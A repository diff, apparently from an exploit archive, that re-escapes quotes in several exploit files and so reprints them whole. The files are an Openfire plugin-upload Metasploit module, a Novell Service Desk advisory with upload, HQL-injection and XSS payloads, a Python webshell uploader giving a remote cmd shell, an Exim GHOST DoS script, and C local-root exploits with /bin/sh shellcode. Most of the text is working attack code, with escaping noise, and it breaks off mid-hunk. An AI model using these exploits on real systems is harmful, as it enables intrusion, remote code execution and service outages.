+				OptBool.new(\'REMOVE_PLUGIN\', [ false, \'Try to remove the plugin after installation\', false ]),
 			], self.class)
 	end
 	def check
 		base = target_uri.path
-		base << '/' if base[-1, 1] != '/'
+		base << \'/\' if base[-1, 1] != \'/\'
-		path = "#{base}login.jsp"
+		path = \"#{base}login.jsp\"
 		res = send_request_cgi(
 			{
-				'uri'    => path
+				\'uri\'    => path
 			})
 		if (not res) or (res.code != 200)
-			print_error("Unable to make a request to: #{path}")
+			print_error(\"Unable to make a request to: #{path}\")
 			return Exploit::CheckCode::Unknown
 		end
-		versioncheck = res.body =~ /Openfire, \D*: (\d)\.(\d).(\d)\s*<\/div>/
+		versioncheck = res.body =~ /Openfire, \\D*: (\\d)\\.(\\d).(\\d)\\s*<\\/div>/
 		if versioncheck.nil? then
-			print_error("Unable to detect Openfire version")
+			print_error(\"Unable to detect Openfire version\")
 			return Exploit::CheckCode::Unknown
 		end
-		print_status("Detected version: #{$1}.#{$2}.#{$3}")
+		print_status(\"Detected version: #{$1}.#{$2}.#{$3}\")
-		version = "#{$1}#{$2}#{$3}".to_i
+		version = \"#{$1}#{$2}#{$3}\".to_i
 		return Exploit::CheckCode::Safe if version > 360
 		# Just to be sure, try to access the log page
-		path = "#{base}setup/setup-/../../log.jsp"
+		path = \"#{base}setup/setup-/../../log.jsp\"
 		res = send_request_cgi(
 			{
-				'uri'    => path
+				\'uri\'    => path
 			})
 		if (not res) or (res.code != 200)
-			print_error("Failed: Error requesting #{path}")
+			print_error(\"Failed: Error requesting #{path}\")
 			return Exploit::CheckCode::Unknown
 		end
@ -133,83 +133,83 @@ class Metasploit3 < Msf::Exploit::Remote
 	def get_plugin_jar(plugin_name)
 		files = [
-			[ "logo_large.gif" ],
+			[ \"logo_large.gif\" ],
-			[ "logo_small.gif" ],
+			[ \"logo_small.gif\" ],
-			[ "readme.html" ],
+			[ \"readme.html\" ],
-			[ "changelog.html" ],
+			[ \"changelog.html\" ],
-			[ "lib", "plugin-metasploit.jar" ]
+			[ \"lib\", \"plugin-metasploit.jar\" ]
 		]
 		jar = Rex::Zip::Jar.new
-		jar.add_files(files, File.join(Msf::Config.install_root, "data", "exploits", "CVE-2008-6508"))
+		jar.add_files(files, File.join(Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2008-6508\"))
-		plugin_author = datastore['PLUGINAUTHOR'] || rand_text_alphanumeric(8+rand(8))
+		plugin_author = datastore[\'PLUGINAUTHOR\'] || rand_text_alphanumeric(8+rand(8))
-		plugin_desc   = datastore['PLUGINDESC']   || rand_text_alphanumeric(8+rand(8))
+		plugin_desc   = datastore[\'PLUGINDESC\']   || rand_text_alphanumeric(8+rand(8))
-		plugin_xml = File.open(File.join(Msf::Config.install_root, "data", "exploits", "CVE-2008-6508", "plugin.xml"), "rb") {|fd| fd.read() }
+		plugin_xml = File.open(File.join(Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2008-6508\", \"plugin.xml\"), \"rb\") {|fd| fd.read() }
 		plugin_xml.gsub!(/PLUGINNAME/, plugin_name)
 		plugin_xml.gsub!(/PLUGINDESCRIPTION/, plugin_desc)
 		plugin_xml.gsub!(/PLUGINAUTHOR/, plugin_author)
-		jar.add_file("plugin.xml", plugin_xml)
+		jar.add_file(\"plugin.xml\", plugin_xml)
 		jar
 	end
 	def exploit
 		base = target_uri.path
-		base << '/' if base[-1, 1] != '/'
+		base << \'/\' if base[-1, 1] != \'/\'
-		plugin_name = datastore['PLUGINNAME'] || rand_text_alphanumeric(8+rand(8))
+		plugin_name = datastore[\'PLUGINNAME\'] || rand_text_alphanumeric(8+rand(8))
 		plugin = get_plugin_jar(plugin_name)
 		arch = target.arch
-		plat = [Msf::Module::PlatformList.new(target['Platform']).platforms[0]]
+		plat = [Msf::Module::PlatformList.new(target[\'Platform\']).platforms[0]]
 		if (p = exploit_regenerate_payload(plat, arch)) == nil
-			print_error("Failed to regenerate payload")
+			print_error(\"Failed to regenerate payload\")
 			return
 		end
-		plugin.add_file("lib/#{rand_text_alphanumeric(8)}.jar", payload.encoded_jar.pack)
+		plugin.add_file(\"lib/#{rand_text_alphanumeric(8)}.jar\", payload.encoded_jar.pack)
 		plugin.build_manifest
 		# Upload the plugin to the server
-		print_status("Uploading plugin #{plugin_name} to the server")
+		print_status(\"Uploading plugin #{plugin_name} to the server\")
 		boundary = rand_text_alphanumeric(6)
-		data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"uploadfile\"; "
+		data = \"--#{boundary}\\r\\nContent-Disposition: form-data; name=\\\"uploadfile\\\"; \"
-		data << "filename=\"#{plugin_name}.jar\"\r\nContent-Type: application/java-archive\r\n\r\n"
+		data << \"filename=\\\"#{plugin_name}.jar\\\"\\r\\nContent-Type: application/java-archive\\r\\n\\r\\n\"
 		data << plugin.pack
-		data << "\r\n--#{boundary}--"
+		data << \"\\r\\n--#{boundary}--\"
 		res = send_request_cgi({
-			'uri'     => "#{base}setup/setup-/../../plugin-admin.jsp?uploadplugin",
+			\'uri\'     => \"#{base}setup/setup-/../../plugin-admin.jsp?uploadplugin\",
-			'method'  => 'POST',
+			\'method\'  => \'POST\',
-			'data'    => data,
+			\'data\'    => data,
-			'headers' =>
+			\'headers\' =>
 				{
-					'Content-Type'   => 'multipart/form-data; boundary=' + boundary,
+					\'Content-Type\'   => \'multipart/form-data; boundary=\' + boundary,
-					'Content-Length' => data.length,
+					\'Content-Length\' => data.length,
-					'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
+					\'Cookie\' => \"JSESSIONID=#{rand_text_numeric(13)}\",
 				}
 		})
-		print_error("Warning: got no response from the upload, continuing...") if !res
+		print_error(\"Warning: got no response from the upload, continuing...\") if !res
 		# Delete the uploaded JAR file
-		if datastore['REMOVE_PLUGIN']
+		if datastore[\'REMOVE_PLUGIN\']
-			print_status("Deleting plugin #{plugin_name} from the server")
+			print_status(\"Deleting plugin #{plugin_name} from the server\")
 			res = send_request_cgi({
-				'uri'     => "#{base}setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}",
+				\'uri\'     => \"#{base}setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}\",
-				'headers' =>
+				\'headers\' =>
 					{
-						'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
+						\'Cookie\' => \"JSESSIONID=#{rand_text_numeric(13)}\",
 					}
 			})
 			if not res
-				print_error("Error deleting the plugin #{plugin_name}. You might want to do this manually.")
+				print_error(\"Error deleting the plugin #{plugin_name}. You might want to do this manually.\")
 			end
 		end
 	end
--- a/platforms/jsp/webapps/39687.txt
+++ b/platforms/jsp/webapps/39687.txt
@ -4,11 +4,11 @@
 Disclosure: 30/03/2016 / Last updated: 10/04/2016
 >> Background on the affected products:
-"Novell Service Desk 7.1.0 is a complete service management solution that allows you to easily monitor and solve services issues so that there is minimal disruption to your organization, which allows users to focus on the core business. Novell Service Desk provides an online support system to meet the service requirements of all your customers, administrators, supervisors, and technicians"
+\"Novell Service Desk 7.1.0 is a complete service management solution that allows you to easily monitor and solve services issues so that there is minimal disruption to your organization, which allows users to focus on the core business. Novell Service Desk provides an online support system to meet the service requirements of all your customers, administrators, supervisors, and technicians\"
 >> Summary:
-Novell Service Desk has several vulnerabilities including a file upload function that can be exploited to achieve authenticated remote code execution. The product appears to be a rebranded version of Absolute Service (another help desk system). The latter has not been tested but it is likely to contain the same vulnerabilities as Novell Service Desk. The Google dork for this application is inurl:"LiveTime/WebObjects". Version 7.2 and above now appear to be branded as "Micro Focus Service Desk". 
+Novell Service Desk has several vulnerabilities including a file upload function that can be exploited to achieve authenticated remote code execution. The product appears to be a rebranded version of Absolute Service (another help desk system). The latter has not been tested but it is likely to contain the same vulnerabilities as Novell Service Desk. The Google dork for this application is inurl:\"LiveTime/WebObjects\". Version 7.2 and above now appear to be branded as \"Micro Focus Service Desk\". 
 Advisories for these vulnerabilities can be found in the Micro Focus site at [1], [2], [3] and [4].
@ -32,7 +32,7 @@ Content-Type: multipart/form-data; boundary=---------------------------247747071
 Content-Length: 533
 -----------------------------2477470717121
-Content-Disposition: form-data; name="0.53.19.0.2.7.0.3.0.0.1.1.1.4.0.0.23"; filename="../../srv/tomcat6/webapps/LiveTime/bla5.jsp"
+Content-Disposition: form-data; name=\"0.53.19.0.2.7.0.3.0.0.1.1.1.4.0.0.23\"; filename=\"../../srv/tomcat6/webapps/LiveTime/bla5.jsp\"
 Content-Type: application/octet-stream
 <HTML>
@ -45,7 +45,7 @@ Content-Type: application/octet-stream
 </BODY>
 </HTML>
 -----------------------------2477470717121
-Content-Disposition: form-data; name="ButtonUpload"
+Content-Disposition: form-data; name=\"ButtonUpload\"
 Upload
 -----------------------------2477470717121--
@ -102,7 +102,7 @@ Affected versions:
 GET /LiveTime/WebObjects/LiveTime.woa/wa/DownloadAction/downloadFile?attachmentId=1&entityName=<HQL injection here>
 Input is passed directly to Hibernate (line 125 of DownloadAction.class):
-        List<?> attachments = ((com.livetime.Session)session()).getDbSession().createQuery(new StringBuilder().append("from ").append(hasEn).append(" as attach where attach.attachmentId = ").append(hasId.intValue()).toString()).list();
+        List<?> attachments = ((com.livetime.Session)session()).getDbSession().createQuery(new StringBuilder().append(\"from \").append(hasEn).append(\" as attach where attach.attachmentId = \").append(hasId.intValue()).toString()).list();
 hasEn is entityName (string) and hasId is attachmentId (integer)
@ -123,7 +123,7 @@ a)
 In the customer portal, clicking the user name will allow you to edit your display name.
 The fields tf_aClientFirstName and tf_aClientLastName are also vulnerable to stored XSS. Other fields might be vulnerable but have not been tested.
 Example:
-tf_aClientFirstName=Jos"><script>alert(1)</script>e&tf_aClientEmail=aa%40aa.bb&tf_aClientLastName="><script>alert(2)</script>Guestaa
+tf_aClientFirstName=Jos\"><script>alert(1)</script>e&tf_aClientEmail=aa%40aa.bb&tf_aClientLastName=\"><script>alert(2)</script>Guestaa
 This can be used to attack an administrator or any other management user, as the name will be changed globally. If an administrator sees the list of users an alert box will pop up.
@ -131,7 +131,7 @@ b)
 In the Forums the content section is vulnerable when creating a new topic.
 The affected parameter is ta_selectedTopicContent.
 Example:
-tf_selectedTopicTitle=aaaaa&ta_selectedTopicContent="><script>alert(2)</script>&ButtonSave=Save
+tf_selectedTopicTitle=aaaaa&ta_selectedTopicContent=\"><script>alert(2)</script>&ButtonSave=Save
 The alert box will pop up when you view the topic.
@ -141,16 +141,16 @@ Example:
 POST /LiveTime/WebObjects/LiveTime.woa/wo/18.0.53.21.0.4.1.3.0.1 HTTP/1.1
 -----------------------------3162880314525
-Content-Disposition: form-data; name="tf_orgUnitName"
+Content-Disposition: form-data; name=\"tf_orgUnitName\"
-"><script>alert(1)</script>
+\"><script>alert(1)</script>
 The alert box will pop up when you view the Organizational Units page and possibly in other pages.
 d)
 In Configuration -> Vendors, the manufacturer name, address and city parameters are vulnerable when you are creating a new Vendor.
 Example:
-tf_aManufacturerFullName="><script>alert(1)</script>&tf_aManufacturerName="><script>alert(1)</script>&tf_aManufacturerAddress="><script>alert(1)</script>&tf_aManufacturerCity="><script>alert(1)</script>&tf_aManufacturerPostalCode=&pu_countryDGDisplayedObjects=WONoSelectionString&tf_aManufacturerPhone=&tf_aManufacturerFax=&tf_aManufacturerUrl=&ButtonSave=Save
+tf_aManufacturerFullName=\"><script>alert(1)</script>&tf_aManufacturerName=\"><script>alert(1)</script>&tf_aManufacturerAddress=\"><script>alert(1)</script>&tf_aManufacturerCity=\"><script>alert(1)</script>&tf_aManufacturerPostalCode=&pu_countryDGDisplayedObjects=WONoSelectionString&tf_aManufacturerPhone=&tf_aManufacturerFax=&tf_aManufacturerUrl=&ButtonSave=Save
 Three alert boxes will pop up when you view the Vendor page and possibly in other pages.
--- a/platforms/jsp/webapps/39691.py
+++ b/platforms/jsp/webapps/39691.py
@ -9,19 +9,19 @@
 import urllib2
 import urllib
-ip = '192.168.150.239'
+ip = \'192.168.150.239\'
 port = 8088
-url = "http://" + ip + ":" + str(port)
+url = \"http://\" + ip + \":\" + str(port)
 #bypass authentication
-url = url+"/olt/Login.do/../../olt/UploadFileUpload.do"
+url = url+\"/olt/Login.do/../../olt/UploadFileUpload.do\"
 request = urllib2.Request(url)
-webshell_content='''
+webshell_content=\'\'\'
-<%@ page import="java.util.*,java.io.*"  %>
+<%@ page import=\"java.util.*,java.io.*\"  %>
    <%
-        if (request.getParameter("{cmd}") != null) {{
+        if (request.getParameter(\"{cmd}\") != null) {{
-            Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("{cmd}"));
+            Process p = Runtime.getRuntime().exec(\"cmd.exe /c \" + request.getParameter(\"{cmd}\"));
            OutputStream os = p.getOutputStream();
            InputStream in = p.getInputStream();
            DataInputStream dis = new DataInputStream(in);
@ -32,65 +32,65 @@ webshell_content='''
            }}
        }}
    %>
-'''
+\'\'\'
-boundary = "---------------------------7e01e2240a1e"
+boundary = \"---------------------------7e01e2240a1e\"
-request.add_header('Content-Type', "multipart/form-data; boundary=" + boundary)
+request.add_header(\'Content-Type\', \"multipart/form-data; boundary=\" + boundary)
-post_data = "--" + boundary + "\r\n"
+post_data = \"--\" + boundary + \"\\r\\n\"
-post_data = post_data + "Content-Disposition: form-data; name=\"storage.extension\"\r\n"
+post_data = post_data + \"Content-Disposition: form-data; name=\\\"storage.extension\\\"\\r\\n\"
-post_data = post_data + "\r\n.jsp\r\n"
+post_data = post_data + \"\\r\\n.jsp\\r\\n\"
-post_data = post_data + "--" + boundary + "\r\n"
+post_data = post_data + \"--\" + boundary + \"\\r\\n\"
-post_data = post_data + "Content-Disposition: form-data; name=\"fileName1\"\r\n"
+post_data = post_data + \"Content-Disposition: form-data; name=\\\"fileName1\\\"\\r\\n\"
-post_data = post_data + "\r\nwebshell.jsp\r\n"
+post_data = post_data + \"\\r\\nwebshell.jsp\\r\\n\"
-post_data = post_data + "--" + boundary + "\r\n"
+post_data = post_data + \"--\" + boundary + \"\\r\\n\"
-post_data = post_data + "Content-Disposition: form-data; name=\"fileName2\"\r\n"
+post_data = post_data + \"Content-Disposition: form-data; name=\\\"fileName2\\\"\\r\\n\"
-post_data = post_data + "\r\n\r\n"
+post_data = post_data + \"\\r\\n\\r\\n\"
-post_data = post_data + "--" + boundary + "\r\n"
+post_data = post_data + \"--\" + boundary + \"\\r\\n\"
-post_data = post_data + "Content-Disposition: form-data; name=\"fileName3\"\r\n"
+post_data = post_data + \"Content-Disposition: form-data; name=\\\"fileName3\\\"\\r\\n\"
-post_data = post_data + "\r\n\r\n"
+post_data = post_data + \"\\r\\n\\r\\n\"
-post_data = post_data + "--" + boundary + "\r\n"
+post_data = post_data + \"--\" + boundary + \"\\r\\n\"
-post_data = post_data + "Content-Disposition: form-data; name=\"fileName4\"\r\n"
+post_data = post_data + \"Content-Disposition: form-data; name=\\\"fileName4\\\"\\r\\n\"
-post_data = post_data + "\r\n\r\n"
+post_data = post_data + \"\\r\\n\\r\\n\"
-post_data = post_data + "--" + boundary + "\r\n"
+post_data = post_data + \"--\" + boundary + \"\\r\\n\"
-post_data = post_data + "Content-Disposition: form-data; name=\"fileType\"\r\n"
+post_data = post_data + \"Content-Disposition: form-data; name=\\\"fileType\\\"\\r\\n\"
-post_data = post_data + "\r\n*\r\n"
+post_data = post_data + \"\\r\\n*\\r\\n\"
-post_data = post_data + "--" + boundary + "\r\n"
+post_data = post_data + \"--\" + boundary + \"\\r\\n\"
-post_data = post_data + "Content-Disposition: form-data; name=\"file1\"; filename=\"webshell.jsp\"\r\n"
+post_data = post_data + \"Content-Disposition: form-data; name=\\\"file1\\\"; filename=\\\"webshell.jsp\\\"\\r\\n\"
-post_data = post_data + "Content-Type: text/plain\r\n"
+post_data = post_data + \"Content-Type: text/plain\\r\\n\"
-post_data = post_data + "\r\n" + webshell_content +"\r\n"
+post_data = post_data + \"\\r\\n\" + webshell_content +\"\\r\\n\"
-post_data = post_data + "--" + boundary + "\r\n"
+post_data = post_data + \"--\" + boundary + \"\\r\\n\"
-post_data = post_data + "Content-Disposition: form-data; name=\"storage.repository\"\r\n"
+post_data = post_data + \"Content-Disposition: form-data; name=\\\"storage.repository\\\"\\r\\n\"
-post_data = post_data + "\r\nDefault\r\n"
+post_data = post_data + \"\\r\\nDefault\\r\\n\"
-post_data = post_data + "--" + boundary + "\r\n"
+post_data = post_data + \"--\" + boundary + \"\\r\\n\"
-post_data = post_data + "Content-Disposition: form-data; name=\"storage.workspace\"\r\n"
+post_data = post_data + \"Content-Disposition: form-data; name=\\\"storage.workspace\\\"\\r\\n\"
-post_data = post_data + "\r\n.\r\n"
+post_data = post_data + \"\\r\\n.\\r\\n\"
-post_data = post_data + "--" + boundary + "\r\n"
+post_data = post_data + \"--\" + boundary + \"\\r\\n\"
-post_data = post_data + "Content-Disposition: form-data; name=\"directory\"\r\n"
+post_data = post_data + \"Content-Disposition: form-data; name=\\\"directory\\\"\\r\\n\"
-post_data = post_data + "\r\n" + "../oats\servers\AdminServer\\tmp\_WL_user\oats_ee\\1ryhnd\war\pages" +"\r\n"
+post_data = post_data + \"\\r\\n\" + \"../oats\\servers\\AdminServer\\\\tmp\\_WL_user\\oats_ee\\\\1ryhnd\\war\\pages\" +\"\\r\\n\"
-post_data = post_data + "--" + boundary + "--"+"\r\n"
+post_data = post_data + \"--\" + boundary + \"--\"+\"\\r\\n\"
 try:
    request.add_data(post_data)
    response = urllib2.urlopen(request)
    if response.code == 200 :
-        print "[+]upload done!"
+        print \"[+]upload done!\"
-        webshellurl = "http://" + ip + ":" + str(port) + "/olt/pages/webshell.jsp"
+        webshellurl = \"http://\" + ip + \":\" + str(port) + \"/olt/pages/webshell.jsp\"
-        print "[+]wait a moment,detecting whether the webshell exists..."
+        print \"[+]wait a moment,detecting whether the webshell exists...\"
        if urllib2.urlopen(webshellurl).code == 200 :
-            print "[+]upload webshell successfully!"
+            print \"[+]upload webshell successfully!\"
-            print "[+]return a cmd shell"
+            print \"[+]return a cmd shell\"
            while True:
-                cmd = raw_input(">>: ")
+                cmd = raw_input(\">>: \")
-                if cmd == "exit" :
+                if cmd == \"exit\" :
                    break
-                print urllib.urlopen(webshellurl+"?{cmd}=" + cmd).read().lstrip()
+                print urllib.urlopen(webshellurl+\"?{cmd}=\" + cmd).read().lstrip()
        else:
-            print "[-]attack fail!"
+            print \"[-]attack fail!\"
    else:
-        print "[-]attack fail!"
+        print \"[-]attack fail!\"
 except Exception as e:
-    print "[-]attack fail!"
+    print \"[-]attack fail!\"
-'''
+\'\'\'
 #run the exploit and get a cmd shell
 root@kali:~/Desktop# python exploit.py 
 [+]upload done!
@ -98,10 +98,10 @@ root@kali:~/Desktop# python exploit.py
 [+]upload webshell successfully!
 [+]return a cmd shell
 >>: whoami
-nt authority\system
+nt authority\\system
 >>: exit
-'''
+\'\'\'
--- a/platforms/linux/dos/35951.py
+++ b/platforms/linux/dos/35951.py
@ -13,7 +13,7 @@
 #
 # USAGE: python ghost-smtp-dos.py <ip> <port>
 #
-# Escape character is '^]'.
+# Escape character is \'^]\'.
 # 220 debian-7-7-64b ESMTP Exim 4.80 ...
 # HELO
 # 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
@ -33,28 +33,28 @@ def main(argv):
    argc = len(argv)
    if argc <= 1:
-            print "usage: %s <host>" % (argv[0])
+            print \"usage: %s <host>\" % (argv[0])
            sys.exit(0)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-    buffer = "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+    buffer = \"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
+ 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\"
    target = argv[1] # SET TARGET
    port = argv[2] # SET PORT
-    print "(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com"
+    print \"(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com\"
-    print "(--==== Sending GHOST SMTP DoS to " + target + ":" + port + " with length:" +str(len(buffer))
+    print \"(--==== Sending GHOST SMTP DoS to \" + target + \":\" + port + \" with length:\" +str(len(buffer))
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect((target,int(port)))
    data = s.recv(1024)
-    print "CONNECTION: " +data
+    print \"CONNECTION: \" +data
-    s.send('HELO ' + buffer + '\r\n')
+    s.send(\'HELO \' + buffer + \'\\r\\n\')
    data = s.recv(1024)
-    print "received: " +data
+    print \"received: \" +data
-    s.send('EHLO ' + buffer + '\r\n')
+    s.send(\'EHLO \' + buffer + \'\\r\\n\')
    data = s.recv(1024)
-    print "received: " +data
+    print \"received: \" +data
    s.close()
 main(sys.argv) 
--- a/platforms/linux/local/1215.c
+++ b/platforms/linux/local/1215.c
@ -7,12 +7,12 @@
 /* 45 Byte /bin/sh >> http://www.milw0rm.com/id.php?id=1169 */
 char shellcode[]=
-                 "\x31\xc0\x31\xdb\x50\x68\x2f\x2f"
+                 \"\\x31\\xc0\\x31\\xdb\\x50\\x68\\x2f\\x2f\"
-                 "\x73\x68\x68\x2f\x62\x69\x6e\x89"
+                 \"\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\"
-                 "\xe3\x50\x53\x89\xe1\x31\xd2\xb0"
+                 \"\\xe3\\x50\\x53\\x89\\xe1\\x31\\xd2\\xb0\"
-                 "\x0b\x51\x52\x55\x89\xe5\x0f\x34"
+                 \"\\x0b\\x51\\x52\\x55\\x89\\xe5\\x0f\\x34\"
-                 "\x31\xc0\x31\xdb\xfe\xc0\x51\x52"
+                 \"\\x31\\xc0\\x31\\xdb\\xfe\\xc0\\x51\\x52\"
-                 "\x55\x89\xe5\x0f\x34";
+                 \"\\x55\\x89\\xe5\\x0f\\x34\";
 int main(int argc,char **argv){
  char buf[96];
@ -20,30 +20,30 @@ int main(int argc,char **argv){
  unsigned long ret;
  int i, offset;
  unsigned long sp(void)
-  { __asm__("movl %esp, %eax");}
+  { __asm__(\"movl %esp, %eax\");}
  char *prog[]={argv[1],buf,NULL};
-  char *env[]={"3v1lsh3ll0=",shellcode,NULL};
+  char *env[]={\"3v1lsh3ll0=\",shellcode,NULL};
  if (argc >= 2) {
-    printf("\n*********************************************\n");
+    printf(\"\\n*********************************************\\n\");
-    printf("   iwconfig Version 26 Localroot Exploit    \n");
+    printf(\"   iwconfig Version 26 Localroot Exploit    \\n\");
-    printf("    Coded by Qnix[at]bsdmail[dot]org      \n");
+    printf(\"    Coded by Qnix[at]bsdmail[dot]org      \\n\");
-    printf("*********************************************\n\n");
+    printf(\"*********************************************\\n\\n\");
  } else {
-    printf("\n*********************************************\n");
+    printf(\"\\n*********************************************\\n\");
-    printf("   iwconfig Version 26 Localroot Exploit    \n");
+    printf(\"   iwconfig Version 26 Localroot Exploit    \\n\");
-    printf("    Coded by Qnix[at]bsdmail[dot]org      \n");
+    printf(\"    Coded by Qnix[at]bsdmail[dot]org      \\n\");
-    printf("*********************************************\n\n");
+    printf(\"*********************************************\\n\\n\");
-    printf("\n USEAGE: ./iwconfig-exploit <iwconfig FULLPATH e.g /sbin/iwconfig or /usr/sbin/iwconfig>\n\n");
+    printf(\"\\n USEAGE: ./iwconfig-exploit <iwconfig FULLPATH e.g /sbin/iwconfig or /usr/sbin/iwconfig>\\n\\n\");
    return 1;
    }
  offset = 0;
  esp = sp();
  ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06;
-  printf("[~] S-p.ESP     : 0x%x\n", esp);
+  printf(\"[~] S-p.ESP     : 0x%x\\n\", esp);
-  printf("[~] O-F.ESP     : 0x%x\n", offset);
+  printf(\"[~] O-F.ESP     : 0x%x\\n\", offset);
-  printf("[~] Return Addr : 0x%x\n\n", ret);
+  printf(\"[~] Return Addr : 0x%x\\n\\n\", ret);
  memset(buf,0x41,sizeof(buf));
  memcpy(&buf[92],&ret,4);
--- a/platforms/linux/local/140.c
+++ b/platforms/linux/local/140.c
@ -11,7 +11,7 @@
 #include <stdio.h>
 #include <unistd.h>
-#define BIN     "/usr/games/xsok"
+#define BIN     \"/usr/games/xsok\"
 #define RETADD  0xbffffa3c
 #define SIZE    200
@ -19,12 +19,12 @@
 unsigned char shellcode[] =
 	/* setregid (20,20) shellcode */
-	"\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47"
+	\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\xb3\\x14\\xb1\\x14\\xb0\\x47\"
-	"\xcd\x80"
+	\"\\xcd\\x80\"
 	/* exec /bin/sh shellcode */
-	"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
+	\"\\x31\\xd2\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\"
-	"\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
+	\"\\x69\\x89\\xe3\\x52\\x53\\x89\\xe1\\x8d\\x42\\x0b\\xcd\\x80\";
@ -33,8 +33,8 @@ int main (int argc, char ** argv)
 	int i, ret = RETADD;
 	char out[SIZE];
-	fprintf(stdout, "\n ---   0x333xsok => xsok 1.02 local games exploit   ---\n");
+	fprintf(stdout, \"\\n ---   0x333xsok => xsok 1.02 local games exploit   ---\\n\");
-	fprintf(stdout, "   ---       Outsiders Se(c)urity Labs 2003       ---\n\n");
+	fprintf(stdout, \"   ---       Outsiders Se(c)urity Labs 2003       ---\\n\\n\");
 	int *xsok = (int *)(out);
@ -43,7 +43,7 @@ int main (int argc, char ** argv)
 	memset((char *)out, 0x90, 63);
 	memcpy((char *)out+63, shellcode, strlen(shellcode));
-	execl (BIN, BIN, "-xsokdir", out, 0x0);
+	execl (BIN, BIN, \"-xsokdir\", out, 0x0);
 }
 // milw0rm.com [2004-01-02]
--- a/platforms/linux/local/178.c
+++ b/platforms/linux/local/178.c
@ -2,7 +2,7 @@
 * MasterSecuritY <www.mastersecurity.fr>
 *
 * openwall.c - Local root exploit in LBNL traceroute
- * Copyright (C) 2000  Michel "MaXX" Kaempf <maxx@mastersecurity.fr>
+ * Copyright (C) 2000  Michel \"MaXX\" Kaempf <maxx@mastersecurity.fr>
 *
 * Updated versions of this exploit and the corresponding advisory will
 * be made available at:
@ -32,32 +32,32 @@
 #define PREV_INUSE 0x1
 #define IS_MMAPPED 0x2
-char *		filename = "/usr/sbin/traceroute";
+char *		filename = \"/usr/sbin/traceroute\";
 unsigned int	stack = 0xc0000000 - 4;
 unsigned int	p = 0x0804ce38;
 unsigned int	victim = 0x0804c88c;
-char * jmp = "\xeb\x0aXXYYYYZZZZ";
+char * jmp = \"\\xeb\\x0aXXYYYYZZZZ\";
 char * shellcode =
 	/* <shellcode>:		xor	%edx,%edx	*/
-	"\x31\xd2"
+	\"\\x31\\xd2\"
 	/* <shellcode+2>:	mov	%edx,%eax	*/
-	"\x89\xd0"
+	\"\\x89\\xd0\"
 	/* <shellcode+4>:	mov	$0xb,%al	*/
-	"\xb0\x0b"
+	\"\\xb0\\x0b\"
 	/* <shellcode+6>:	mov	$XXXX,%ebx	*/
-	"\xbbXXXX"
+	\"\\xbbXXXX\"
 	/* <shellcode+11>:	mov	$XXXX,%ecx	*/
-	"\xb9XXXX"
+	\"\\xb9XXXX\"
 	/* <shellcode+16>:	mov	%ebx,(%ecx)	*/
-	"\x89\x19"
+	\"\\x89\\x19\"
 	/* <shellcode+18>:	mov	%edx,0x4(%ecx)	*/
-	"\x89\x51\x04"
+	\"\\x89\\x51\\x04\"
 	/* <shellcode+21>:	int	$0x80		*/
-	"\xcd\x80";
+	\"\\xcd\\x80\";
-char * program = "/bin/sh";
+char * program = \"/bin/sh\";
 int zero( unsigned int ui )
 {
@ -71,29 +71,29 @@ int main()
 {
